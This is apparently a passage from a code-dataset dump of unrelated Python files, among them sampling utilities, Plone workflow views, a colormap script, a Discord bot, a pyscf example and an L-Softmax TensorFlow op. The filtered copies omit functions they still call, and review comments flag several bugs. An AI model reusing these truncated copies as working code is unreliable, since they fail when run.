    """Return an i x j double matrix whose every row is [1, 2, ..., j].

    Replaces the original element-by-element Python fill with a single
    np.tile call over one precomputed row.
    """
    return np.tile(np.arange(1, j + 1, dtype=np.double), (i, 1))
def runif_std(n):
    """Draw ``n`` independent standard-uniform samples as a double vector."""
    # One scalar draw per element, so the underlying random stream is
    # consumed exactly as before.
    samples = [np.random.uniform(low=0, high=1) for _ in range(n)]
    return np.array(samples, dtype=np.double)
def convertIntegerToNumericLhs(intMat):
    """Convert an integer LHS (levels 1..n) into a numeric LHS in [0, 1).

    Each level ``m`` is jittered uniformly inside its own bin:
    ``(m - 1 + eps) / n`` with ``eps ~ U(0, 1)``, so that
    ``floor(n * result) + 1`` recovers ``intMat``.

    Parameters
    ----------
    intMat : numpy.ndarray of shape (n, k)
        Integer design with levels in ``1..n``.

    Returns
    -------
    numpy.ndarray of shape (n, k), dtype float64
    """
    n, k = intMat.shape
    # One flat draw, consumed column-major exactly like the original
    # row-within-column counter loop (eps[col * n + row] -> cell[row, col]).
    eps = np.random.rand(n * k).reshape(k, n).T
    return ((intMat - 1).astype(np.double) + eps) / np.double(n)
def sumInvDistance(a):
    # Total of all entries of the pairwise-distance matrix of the rows of
    # ``a`` (the ``[::-1]`` row reversal does not change the sum).
    # NOTE(review): despite the name, no inverse (1/d) is taken here, and
    # calculateDistance fills only the strict upper triangle of an
    # ``np.empty`` array, so uninitialized entries also enter this sum --
    # confirm whether that is intended.
    return np.sum(calculateDistance(a)[::-1]) # equals to accumulate
def calculateDistanceSquared(a, b):
    """Squared Euclidean distance between two equally-shaped vectors.

    Computed as an accumulation of ``(a_i - b_i) ** 2`` via the project's
    ``inner_product`` helper (signature appears to mirror C++
    ``std::inner_product``: init value, reduce op, transform op -- confirm
    in ``bclib``).

    Raises
    ------
    Exception
        If ``a`` and ``b`` do not have the same shape.
    """
    if a.shape != b.shape:
        raise Exception("Inputs of a different size")
    return inner_product(a, b, np.double(0), lambda a, b: a+b, lambda x, y: (x-y) * (x-y))
def calculateDistance(mat):
    """Pairwise Euclidean distances between the rows of ``mat``.

    Only the strict upper triangle ``result[i, j]`` (``i < j``) holds a
    distance; the diagonal and lower triangle are zero.

    Parameters
    ----------
    mat : numpy.ndarray of shape (m, d)

    Returns
    -------
    numpy.ndarray of shape (m, m), dtype float64
    """
    m_rows = mat.shape[0]
    # Bug fix: the original used np.empty(), leaving the diagonal and lower
    # triangle as uninitialized memory that consumers (e.g. sumInvDistance)
    # then summed.  Zero-initialize instead.
    result = np.zeros((m_rows, m_rows), dtype=np.double)
    for i in range(m_rows - 1):
        for j in range(i + 1, m_rows):
            diff = mat[i, :] - mat[j, :]
            # Same value as sqrt(calculateDistanceSquared(mat[i], mat[j]))
            # without the bclib inner_product dependency.
            result[i, j] = np.sqrt(np.double(np.sum(diff * diff)))
    return result
def calculateSOptimal(mat):
    # S-optimality score of a design: reciprocal of the summed pairwise
    # row distances, so more spread-out designs score higher.
    return 1.0 / sumInvDistance(mat)
def runifint(a, b, n=None):
    """Draw uniform random integer(s) on the inclusive range [a, b].

    Parameters
    ----------
    a, b : int
        Inclusive lower and upper bounds.
    n : int or None, optional
        When None (or 0), return a single draw; otherwise an array of
        ``n`` draws.

    Returns
    -------
    numpy.float64 or numpy.ndarray
        Integer-valued floats (the original return types are preserved).
    """
    if not n:
        return a + (np.floor((np.random.uniform(low=0, high=1) * (np.double(b) + 1.0 - np.double(a)))))
    else:
        result = np.empty(n).astype(np.double)
        r = runif_std(n)
        for i in range(n):
            # Bug fix: the vector branch previously scaled by
            # (b + 1.0 - b + 1.0 - a) == (2.0 - a); use the same range
            # width (b + 1 - a) as the scalar branch so draws cover [a, b].
            result[i] = a + (np.floor(r[i] * (np.double(b) + 1.0 - np.double(a))))
        return result
| 2,511 | 0 | 239 |
ca26151593854c11dd77251a6952907ae9d39bb6 | 5,212 | py | Python | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | null | null | null | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | null | null | null | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | 1 | 2021-11-01T07:58:18.000Z | 2021-11-01T07:58:18.000Z | # Copyright (c) 2007 gocept gmbh & co. kg
# See also LICENSE.txt
# $Id$
"""Process related views"""
import zope.component
from Products.CMFCore.utils import getToolByName
from Products.Archetypes.config import UID_CATALOG
import Products.AlphaFlow.interfaces
import Products.AlphaFlow.process
from Products.AlphaFlow.browser.base import AlphaFlowView
import Products.AlphaFlow.utils
class ProcessReadContainer(AlphaFlowView):
"""Management view for readable process containers.
"""
class ProcessWriteContainer(AlphaFlowView):
    """Management view for writeable process containers."""
    def addProcess(self, title, redirect):
        """Adds new process to process manager.

        Creates a process under a generated id, gives it an editable
        version titled *title*, and redirects with a Plone status message.
        """
        id = Products.AlphaFlow.utils.generateUniqueId('process')
        process = self.context[id] = Products.AlphaFlow.process.Process(id)
        editable = process.editable(
            Products.AlphaFlow.process.ProcessVersion())
        editable.title = title
        status = "?portal_status_message=Workflow created"
        self.request.response.redirect(redirect + status)
class PortalProcesses(AlphaFlowView):
"""Management view for all processes within a portal at once."""
| 34.289474 | 76 | 0.646969 | # Copyright (c) 2007 gocept gmbh & co. kg
# See also LICENSE.txt
# $Id$
"""Process related views"""
import zope.component
from Products.CMFCore.utils import getToolByName
from Products.Archetypes.config import UID_CATALOG
import Products.AlphaFlow.interfaces
import Products.AlphaFlow.process
from Products.AlphaFlow.browser.base import AlphaFlowView
import Products.AlphaFlow.utils
class Process(AlphaFlowView):
    """Browser view exposing update actions on a workflow process."""
    def manage_update(self, redirect):
        """Re-run the process update, then redirect (ZMI flavour)."""
        self.context.update()
        self.request.response.redirect(redirect)
    def update(self, redirect):
        """Re-run the process update, then redirect with a Plone status
        message appended to the target URL."""
        self.context.update()
        status = "?portal_status_message=Workflow updated"
        self.request.response.redirect(redirect + status)
class ProcessVersion(AlphaFlowView):
    """Browser view with actions on a single workflow process version."""
    def restartInstances(self, redirect):
        """Replace running instances with ones based on this version."""
        pm = getToolByName(self.context, "workflow_manager")
        pm.replaceInstances(self.context)
        status = "?portal_status_message=" \
                 "Instances restarted using current workflow version"
        self.request.response.redirect(redirect+status)
    def make_editable(self, redirect):
        """Copy this version to the process' editable slot, then redirect."""
        self.context.copyToCurrent()
        # NOTE(review): `container` is computed but never used.
        container = self.context.acquireProcess().getParentNode()
        status = "?portal_status_message=" \
                 "Copied version '%s'." % self.context.getId()
        self.request.response.redirect(redirect+status)
class ProcessReadContainer(AlphaFlowView):
    """Management view for readable process containers.
    """
    def __init__(self, *args, **kwargs):
        # Plain pass-through to the base view class.
        super(ProcessReadContainer, self).__init__(*args, **kwargs)
    def is_global(self):
        # XXX ??? -- always reports non-global; confirm intent.
        return False
    def list(self):
        """Iterate over the IProcess objects contained in the context."""
        for obj in self.context.objectValues():
            if Products.AlphaFlow.interfaces.IProcess.providedBy(obj):
                yield obj
class ProcessWriteContainer(AlphaFlowView):
    """Management view for writeable process containers."""
    def __init__(self, *args, **kwargs):
        # Plain pass-through to the base view class.
        super(ProcessWriteContainer, self).__init__(*args, **kwargs)
    def _redirect(self):
        # Return to the ZMI process listing of this container.
        self.request.response.redirect(self.context.absolute_url() +
                                       "/manage_processes")
    def manage_addProcess(self, id):
        """Create an empty process under `id` (ZMI action).

        NOTE(review): the parameter name `id` shadows the builtin; kept
        throughout this class for ZMI form compatibility.
        """
        self.context[id] = Products.AlphaFlow.process.Process(id)
        self._redirect()
    def addProcess(self, title, redirect):
        """Adds new process to process manager."""
        id = Products.AlphaFlow.utils.generateUniqueId('process')
        process = self.context[id] = Products.AlphaFlow.process.Process(id)
        editable = process.editable(
            Products.AlphaFlow.process.ProcessVersion())
        editable.title = title
        status = "?portal_status_message=Workflow created"
        self.request.response.redirect(redirect + status)
    def manage_removeProcess(self, id, redirect):
        """Delete process `id` (ZMI action, no status message)."""
        del self.context[id]
        self.request.response.redirect(redirect)
    def removeProcess(self, id, redirect):
        """Delete process `id` and report via a Plone status message."""
        del self.context[id]
        status = "?portal_status_message=Workflow deleted"
        self.request.response.redirect(redirect + status)
    def manage_importXML(self, id, xmlfile):
        """Import a process version from XML and store it under `id`."""
        importer = zope.component.getUtility(
            Products.AlphaFlow.interfaces.IWorkflowImporter, name='xml')
        version = importer(xmlfile)
        self.context[id] = Products.AlphaFlow.process.Process(id)
        process = self.context[id]
        process.editable(version)
        self._redirect()
class PortalProcesses(AlphaFlowView):
    """Management view for all processes within a portal at once."""
    def list_by_path(self):
        """Group all process definitions by their container path.

        Returns a list of dicts (manage_url, plone_url, title, processes),
        one per container; the global container entry (keyed by path None)
        is always present, even when it holds no processes.
        """
        GLOBAL_TITLE = "Global process definitions"
        def manage_url(container):
            # ZMI management listing for the container.
            return container.absolute_url() + "/@@manage_processes"
        def plone_url(container):
            # Plone-skinned listing for the container.
            return container.absolute_url() + "/@@alphaflow_processes"
        pm = getToolByName(self, "workflow_manager")
        # NOTE(review): `cat` is looked up but never used.
        cat = getToolByName(self, UID_CATALOG)
        processes_by_container = {}
        for process in pm.listProcessDefinitions():
            container = process.getParentNode()
            processes_by_container.setdefault(container, []).append(process)
        global_container_path = '/'.join(pm.processes.getPhysicalPath())
        processes_by_path = {}
        for container, processes in processes_by_container.items():
            path = '/'.join(container.getPhysicalPath())
            if path.startswith(global_container_path):
                # Processes under the global container are pooled under
                # the None key.
                path = None
                title = GLOBAL_TITLE
            else:
                title = container.title_or_id()
            processes_by_path[path] = {
                "manage_url": manage_url(container),
                "plone_url": plone_url(container),
                "title": title,
                "processes": processes,
            }
        if None not in processes_by_path:
            processes_by_path[None] = {
                "manage_url": manage_url(pm.processes),
                "plone_url": plone_url(pm.processes),
                "title": GLOBAL_TITLE,
                "processes": [],
            }
        # NOTE(review): sorting keys that mix None with strings relies on
        # Python 2 ordering (None sorts first); this raises on Python 3.
        return [data for path, data in sorted(processes_by_path.items())]
| 3,572 | 23 | 424 |
93e18ce7f40ed19716c2eff6ecac85730cb2095f | 1,224 | py | Python | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | 1 | 2021-06-14T11:51:37.000Z | 2021-06-14T11:51:37.000Z | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | null | null | null | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | 2 | 2021-01-20T16:22:57.000Z | 2021-02-14T12:31:02.000Z | #!/usr/bin/env python3
#
# Copyright (C) 2018--2019 Chi-kwan Chan
# Copyright (C) 2018--2019 Steward Observatory
#
# This file is part of ehtplot.
#
# ehtplot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ehtplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ehtplot. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ehtplot.color.cmap import mergecmap
from ehtplot.color.ctab import _path, ext, get_ctab, save_ctab
# NOTE(review): this filtered copy calls save_cmap() without defining it
# anywhere above, so running it as-is raises NameError.
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
                     {'name':'ehtorange'}]), "ehtblueorange")
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
                     {'name':'ehtviolet'}]), "ehtblueviolet")
| 37.090909 | 70 | 0.71732 | #!/usr/bin/env python3
#
# Copyright (C) 2018--2019 Chi-kwan Chan
# Copyright (C) 2018--2019 Steward Observatory
#
# This file is part of ehtplot.
#
# ehtplot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ehtplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ehtplot. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ehtplot.color.cmap import mergecmap
from ehtplot.color.ctab import _path, ext, get_ctab, save_ctab
def save_cmap(cm, name):
    """Extract the color table of colormap *cm* and write it to
    ``<_path>/<name><ext>``."""
    target = _path + "/" + name + ext
    save_ctab(get_ctab(cm), target)
# Merge a reverted 'ehtblue' ramp with 'ehtorange' / 'ehtviolet' and save
# the resulting combined colormaps.
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
                     {'name':'ehtorange'}]), "ehtblueorange")
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
                     {'name':'ehtviolet'}]), "ehtblueviolet")
| 51 | 0 | 23 |
4b966c0ae593681a28d86b6768f14fd6e0a06939 | 894 | py | Python | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | null | null | null | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | null | null | null | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | 1 | 2020-11-20T15:25:26.000Z | 2020-11-20T15:25:26.000Z | from pathlib import Path
import configparser
import json
import discord
from app import client, config
def load_extensions(cogs: str) -> None:
    '''
    Loads all extensions recursively.

    Params:
        cogs: str
            Relative path to cogs dir.
    '''
    # Bug fix: this function was decorated with @client.event, a decorator
    # meant for coroutine event handlers (the filtered-out on_ready);
    # discord.py rejects plain functions there, so the stray decorator is
    # removed.
    for extension in Path(cogs).rglob('*.py'):
        # "cogs/foo/bar.py" -> "cogs.foo.bar" (strip the ".py" suffix).
        extension = '.'.join(extension.parts)[:-3]
        try:
            client.load_extension(extension)
            print(f'{extension} has been loaded.')
        except Exception as e:
            # A broken cog must not stop the remaining ones from loading.
            print(f'{extension} could not be loaded: {e}')
if __name__ == '__main__':
load_extensions(config['DEFAULT']['COG_DIR'])
client.run(config['CLIENT']['TOKEN'])
| 22.35 | 60 | 0.62528 | from pathlib import Path
import configparser
import json
import discord
from app import client, config
@client.event
async def on_ready():
    # Gateway handshake finished: advertise the configured presence
    # (status + "playing" activity) and log readiness to stdout.
    await client.change_presence(
        status=config['CLIENT']['STATUS'],
        activity=discord.Game(config['CLIENT']['ACTIVITY']))
    print('Up and running!')
def load_extensions(cogs: str) -> None:
    '''
    Loads all extensions recursively.\n
    Params:
        cogs: str
            Relative path to cogs dir.
    '''
    for extension in Path(cogs).rglob('*.py'):
        # "cogs/foo/bar.py" -> "cogs.foo.bar" (strip the ".py" suffix).
        extension = '.'.join(extension.parts)[:-3]
        try:
            client.load_extension(extension)
            print(f'{extension} has been loaded.')
        except Exception as e:
            # A broken cog must not stop the remaining ones from loading.
            print(f'{extension} could not be loaded: {e}')
if __name__ == '__main__':
load_extensions(config['DEFAULT']['COG_DIR'])
client.run(config['CLIENT']['TOKEN'])
| 168 | 0 | 22 |
671214d2338ab823f014d1f4f04fcba09906319f | 564 | py | Python | examples/tools/davidson_eigh.py | Warlocat/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | 2 | 2019-05-28T05:25:56.000Z | 2019-11-09T02:16:43.000Z | examples/tools/davidson_eigh.py | lzypotato/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | null | null | null | examples/tools/davidson_eigh.py | lzypotato/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | 1 | 2019-11-09T02:13:16.000Z | 2019-11-09T02:13:16.000Z | #!/usr/bin/env python
'''
Calling davidson solver for the lowest eigenvalues of a Hermitian matrix
'''
import numpy
from pyscf import lib
n = 100
# Random symmetric (Hermitian) test matrix to diagonalize.
a = numpy.random.rand(n,n)
a = a + a.T
# Define the matrix-vector operation
# NOTE(review): this filtered copy omits the matvec definition used below
# (def matvec(x): return a.dot(x)), so it raises NameError as-is.
# Define the preconditioner. It can be just the diagonal elements of the
# matrix.
precond = a.diagonal()
# Define the initial guess
x_init = numpy.zeros(n)
x_init[0] = 1
e, c = lib.eigh(matvec, x_init, precond, nroots=4, max_cycle=1000, verbose=5)
print('Eigenvalues', e)
| 20.142857 | 78 | 0.677305 | #!/usr/bin/env python
'''
Calling davidson solver for the lowest eigenvalues of a Hermitian matrix
'''
import numpy
from pyscf import lib
n = 100
a = numpy.random.rand(n,n)
a = a + a.T
# Define the matrix-vector operation
def matvec(x):
    # Matrix-vector product against the module-level symmetric matrix
    # ``a``; this operator is handed to lib.eigh (Davidson solver) below.
    return a.dot(x)
# Define the preconditioner. It can be just the diagonal elements of the
# matrix.
precond = a.diagonal()
# Define the initial guess
x_init = numpy.zeros(n)
x_init[0] = 1
e, c = lib.eigh(matvec, x_init, precond, nroots=4, max_cycle=1000, verbose=5)
print('Eigenvalues', e)
| 14 | 0 | 23 |
3d79bf9dde091d861b40e8d30fad0af92b14e60d | 6,033 | py | Python | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import math
import uuid
import tensorflow as tf
margin = 4
beta = 100
scale = 0.99
beta_min = 0
eps = 0
c_map = []
k_map = []
c_m_n = lambda m, n: math.factorial(n) / math.factorial(m) / math.factorial(n - m)
for i in range(margin + 1):
c_map.append(c_m_n(i, margin))
k_map.append(math.cos(i * math.pi / margin))
def find_k(cos_t):
    '''find k for cos(theta)

    Returns the index k such that cos_t lies in [k_map[k + 1], k_map[k]],
    where k_map[i] = cos(i * pi / margin).
    '''
    # for numeric issue
    eps = 1e-5
    # Tolerant "less or roughly equal" at the interval endpoints.
    le = lambda x, y: x < y or abs(x - y) < eps
    for i in range(margin):
        if le(k_map[i + 1], cos_t) and le(cos_t, k_map[i]):
            return i
    raise ValueError('can not find k for cos_t = %f' % cos_t)
def calc_cos_mt(cos_t):
    '''calculate cos(m*theta)

    Multiple-angle expansion:
    cos(m*t) = sum_p (-1)^p * C(2p, m) * cos(t)^(m-2p) * (sin^2 t)^p.
    '''
    cos_mt = 0
    sin2_t = 1 - cos_t * cos_t
    # flag alternates so the p-th term carries sign (-1)^p.
    flag = -1
    for p in range(margin // 2 + 1):
        flag *= -1
        cos_mt += flag * c_map[2*p] * pow(cos_t, margin-2*p) * pow(sin2_t, p)
    return cos_mt
| 37.943396 | 116 | 0.532405 | import numpy as np
import math
import uuid
import tensorflow as tf
# L-Softmax hyper-parameters: angular margin m = 4 and the annealing
# weight beta (multiplied by `scale` after each backward pass, floored at
# beta_min).  eps guards the cosine division in the forward pass.
margin = 4
beta = 100
scale = 0.99
beta_min = 0
eps = 0
# c_map[i] = binomial coefficient C(i, margin);
# k_map[i] = cos(i * pi / margin), the interval boundaries used by find_k.
c_map = []
k_map = []
c_m_n = lambda m, n: math.factorial(n) / math.factorial(m) / math.factorial(n - m)
for i in range(margin + 1):
    c_map.append(c_m_n(i, margin))
    k_map.append(math.cos(i * math.pi / margin))
def find_k(cos_t):
    """Locate the index k such that cos_t falls inside the interval
    [k_map[k + 1], k_map[k]], using a small tolerance so values sitting
    exactly on an interval boundary are still matched."""
    tol = 1e-5
    def leq(x, y):
        # x <= y, up to the floating-point tolerance.
        return x < y or abs(x - y) < tol
    for idx in range(margin):
        lower, upper = k_map[idx + 1], k_map[idx]
        if leq(lower, cos_t) and leq(cos_t, upper):
            return idx
    raise ValueError('can not find k for cos_t = %f' % cos_t)
def find_k_vector(cos_t_vec):
    # Apply find_k element-wise to a 1-D array of cos(theta) values.
    k_val = []
    for i in range(cos_t_vec.shape[0]):
        try:
            k_val.append(find_k(cos_t_vec[i]))
        except ValueError:
            # NOTE(review): on failure the vector is only printed and no
            # entry is appended, so the returned list can end up shorter
            # than the input; callers build np.array() from it assuming
            # equal length -- confirm this is intended.
            print(cos_t_vec)
    return k_val
def calc_cos_mt(cos_t):
    """Evaluate cos(margin * theta) from cos(theta) using the
    multiple-angle expansion
    sum_p (-1)^p * C(2p, margin) * cos^(margin-2p) * (sin^2)^p."""
    sin_sq = 1 - cos_t * cos_t
    total = 0
    for p in range(margin // 2 + 1):
        sign = (-1) ** p
        total += sign * c_map[2 * p] * pow(cos_t, margin - 2 * p) * pow(sin_sq, p)
    return total
def calc_cos_mt_vector(cos_t_vector):
    """Element-wise calc_cos_mt over the leading axis; returns a list."""
    return [calc_cos_mt(cos_t_vector[i]) for i in range(cos_t_vector.shape[0])]
def lsoftmax(x, weights, labels):
    """Large-margin softmax (L-Softmax) logits op for TensorFlow 1.x.

    Builds a py_func forward pass that replaces each sample's target-class
    logit ``|x||w|cos(theta)`` by ``|x||w|psi(theta)`` with
    ``psi(t) = (-1)**k * cos(margin*t) - 2k``, blended with the plain
    logit through the module-level annealing weight ``beta``, and
    registers a custom gradient implementing the matching backward pass
    in NumPy.

    Parameters: x (features), weights (class weight matrix), labels
    (integer class labels).  Returns float32 logits.
    """
    def _lsoftmax(net_val, weights, labels):
        # Forward pass, executed on NumPy arrays via tf.py_func.
        global beta, scale
        normalize_net = np.linalg.norm(net_val, axis=1).reshape([net_val.shape[0], 1])
        normalize_weights = np.linalg.norm(weights, axis=0).reshape([-1, weights.shape[1]])
        normalize_val = normalize_net * normalize_weights
        indexes = np.arange(net_val.shape[0])
        labels = labels.reshape((-1,))
        normalize_val_target = normalize_val[indexes, labels]
        logit = np.dot(net_val, weights)
        # cos(theta) between each sample and its target-class weight.
        cos_t_target = logit[indexes, labels] / (normalize_val_target + eps)
        k_val = np.array(find_k_vector(cos_t_target))
        cos_mt_val = np.array(calc_cos_mt_vector(cos_t_target))
        # psi(theta) = (-1)^k * cos(margin*theta) - 2k
        logit_output_cos = np.power(-1, k_val) * cos_mt_val - 2 * k_val
        logit_output = logit_output_cos * normalize_val_target
        # Blend margin logit with the plain logit via the annealed beta.
        logit_output_beta = (logit_output + beta * logit[indexes, labels]) / (1 + beta)
        logit[indexes, labels] = logit_output_beta
        return logit
    def _lsoftmax_grad(x, w, label, grad):
        # Backward pass: start from plain-softmax gradients, then add the
        # margin correction for target-class entries.
        global beta, scale, beta_min
        # original without lsoftmax
        w_grad = x.T.dot(grad) # 2, 10
        x_grad = grad.dot(w.T) # 2, 2
        n = label.shape[0]
        m = w.shape[1]
        feature_dim = w.shape[0]
        cos_t = np.zeros(n, dtype=np.float32)
        cos_mt = np.zeros(n, dtype=np.float32)
        sin2_t = np.zeros(n, dtype=np.float32)
        fo = np.zeros(n, dtype=np.float32)
        k = np.zeros(n, dtype=np.int32)
        x_norm = np.linalg.norm(x, axis=1)
        w_norm = np.linalg.norm(w, axis=0)
        w_tmp = w.T
        # Cache per-sample angle quantities for the target class.
        for i in range(n):
            yi = int(label[i])
            f = w_tmp[yi].dot(x[i])
            cos_t[i] = f / (w_norm[yi] * x_norm[i])
            k[i] = find_k(cos_t[i])
            cos_mt[i] = calc_cos_mt(cos_t[i])
            sin2_t[i] = 1 - cos_t[i]*cos_t[i]
            fo[i] = f
        # gradient w.r.t. x_i
        for i in range(n):
            # df / dx at x = x_i, w = w_yi
            j = yi = int(label[i])
            dcos_dx = w_tmp[yi] / (w_norm[yi]*x_norm[i]) - x[i] * fo[i] / (w_norm[yi]*pow(x_norm[i], 3))
            dsin2_dx = -2 * cos_t[i] * dcos_dx
            dcosm_dx = margin*pow(cos_t[i], margin-1) * dcos_dx # p = 0
            flag = 1
            for p in range(1, margin//2+1):
                flag *= -1
                dcosm_dx += flag * c_map[2*p] * (p*pow(cos_t[i], margin-2*p)*pow(sin2_t[i], p-1)*dsin2_dx +
                                                 (margin-2*p)*pow(cos_t[i], margin-2*p-1)*pow(sin2_t[i], p)*dcos_dx)
            df_dx = (pow(-1, k[i]) * cos_mt[i] - 2*k[i]) * w_norm[yi] / x_norm[i] * x[i] + \
                    pow(-1, k[i]) * w_norm[yi] * x_norm[i] * dcosm_dx
            alpha = 1 / (1 + beta)
            x_grad[i] += alpha * grad[i, yi] * (df_dx - w_tmp[yi])
        # gradient w.r.t. w_j
        for j in range(m):
            dw = np.zeros(feature_dim, dtype=np.float32)
            for i in range(n):
                yi = int(label[i])
                if yi == j:
                    # df / dw at x = x_i, w = w_yi and yi == j
                    dcos_dw = x[i] / (w_norm[yi]*x_norm[i]) - w_tmp[yi] * fo[i] / (x_norm[i]*pow(w_norm[yi], 3))
                    dsin2_dw = -2 * cos_t[i] * dcos_dw
                    dcosm_dw = margin*pow(cos_t[i], margin-1) * dcos_dw # p = 0
                    flag = 1
                    for p in range(1, margin//2+1):
                        flag *= -1
                        dcosm_dw += flag * c_map[2*p] * (p*pow(cos_t[i], margin-2*p)*pow(sin2_t[i], p-1)*dsin2_dw +
                                                         (margin-2*p)*pow(cos_t[i], margin-2*p-1)*pow(sin2_t[i], p)*dcos_dw)
                    df_dw_j = (pow(-1, k[i]) * cos_mt[i] - 2*k[i]) * x_norm[i] / w_norm[yi] * w_tmp[yi] + \
                              pow(-1, k[i]) * w_norm[yi] * x_norm[i] * dcosm_dw
                    dw += grad[i, yi] * (df_dw_j - x[i])
            alpha = 1 / (1 + beta)
            w_grad[:, j] += alpha * dw
        # Anneal beta towards beta_min after every backward pass.
        beta *= scale
        beta = max(beta, beta_min)
        return x_grad, w_grad
    def _lsoftmax_grad_op(op, grad):
        # Gradient override hooked onto the forward py_func node.
        x = op.inputs[0]
        weights = op.inputs[1]
        labels = op.inputs[2]
        x_grad, w_grad = tf.py_func(_lsoftmax_grad, [x, weights, labels, grad], [tf.float32, tf.float32])
        return x_grad, w_grad, labels
    # Register the custom gradient under a unique name so repeated calls
    # do not collide, then build the forward op with the override active.
    grad_name = 'lsoftmax_' + str(uuid.uuid4())
    tf.RegisterGradient(grad_name)(_lsoftmax_grad_op)
    g = tf.get_default_graph()
    with g.gradient_override_map({"PyFunc": grad_name}):
        output = tf.py_func(_lsoftmax, [x, weights, labels], tf.float32)
    return output
| 5,028 | 0 | 69 |
f114e6783c5c73f9ca3b2209f92b1d2dec1ed046 | 701 | py | Python | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | null | null | null | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | 5 | 2021-09-08T02:55:55.000Z | 2022-03-12T01:00:56.000Z | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_config.ipynb (unless otherwise specified).
__all__ = ['device', 'imsize', 'normalization_mean', 'normalization_std', 'content_layers_default',
'style_layers_default']
# Cell
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
imsize = 512 if torch.cuda.is_available() else 128
# VGG network was trained on normalized images, so must do the same to ours
normalization_mean = torch.tensor([[0.485, 0.456, 0.406]]).to(device)
normalization_std = torch.tensor([[0.229, 0.224, 0.225]]).to(device)
content_layers_default = ['conv4_2']
style_layers_default = ['conv1_1', 'conv2_1', 'conv3_1', 'conv4_1', 'conv5_1'] | 41.235294 | 99 | 0.728959 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_config.ipynb (unless otherwise specified).
__all__ = ['device', 'imsize', 'normalization_mean', 'normalization_std', 'content_layers_default',
           'style_layers_default']
# Cell
import torch
# Prefer the GPU when present; use a smaller working image on CPU so
# style transfer stays tractable.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
imsize = 512 if torch.cuda.is_available() else 128
# VGG network was trained on normalized images, so must do the same to ours
# (these are the standard ImageNet per-channel mean / std values).
normalization_mean = torch.tensor([[0.485, 0.456, 0.406]]).to(device)
normalization_std = torch.tensor([[0.229, 0.224, 0.225]]).to(device)
# Layer whose activations define the content loss (the style-layer list
# follows on the next line of the file).
content_layers_default = ['conv4_2']
style_layers_default = ['conv1_1', 'conv2_1', 'conv3_1', 'conv4_1', 'conv5_1'] | 0 | 0 | 0 |
07a62f6d7ebf94a24a8085c3c1373df54bd21409 | 874 | py | Python | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | 3 | 2022-02-15T15:33:44.000Z | 2022-02-16T15:31:28.000Z | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | null | null | null | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | null | null | null | from django import forms
# from django.forms import ModelChoiceField
from .models import Incident
| 30.137931 | 89 | 0.602975 | from django import forms
